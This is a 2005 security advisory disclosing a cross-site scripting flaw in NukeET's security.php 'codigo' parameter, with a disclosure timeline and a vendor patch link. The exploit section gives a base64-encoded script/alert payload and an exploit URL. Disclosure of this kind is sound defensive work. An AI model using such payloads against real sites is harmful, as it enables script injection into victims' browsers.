NukeET 'codigo' variable cross site scripting

################################################
NukeET 'codigo' variable cross site scripting
vendor url:http://www.truzone.org
advisore:http://lostmon.blogspot.com/2005/05/
nukeet-codigo-variable-cross-site.html
Vendor confirmed : yes exploit available: yes
OSVDB ID:16214
Secunia:15332
BID:13570
Securitytracker:1013936
#################################################

NukeET Contains a flaw too that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'codigo' variable upon submission to the 'security.php'scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a loss
of integrity.

bug found by Suko , investigate and reporter by Lostmon.

##########
versions
##########

prior to 3.2 afected

##########
solution:
##########

vendor patch

http://www.truzone.org/modules.php?name=Projet&op=getit&iddow=77

###########
timeline
###########

discovered: 9 may 2005
vendor notify: 9 may 2005
vendor response : 10 may 2005
vendor fix: 10 may 2005
disclosure: 10 may 2005


##########
exploit:
##########

'codigo' variable acepts base64 url encode ,
if we encode for example:

<script>alert()</script><h1>XSS PoW@ !!!</h1>

in base64 this is:

PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+

if we aded this base64 code the alert and de tag h1
is executed with any problem.
http://[victim]/security.php?codigo=
PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+
PGgxPlhTUyBQb1dAICEhITwvaDE+


################ End ##################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
thnx to Suko "la paciencia es una virtud pekeño Jedy"

--
atentamente:

Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....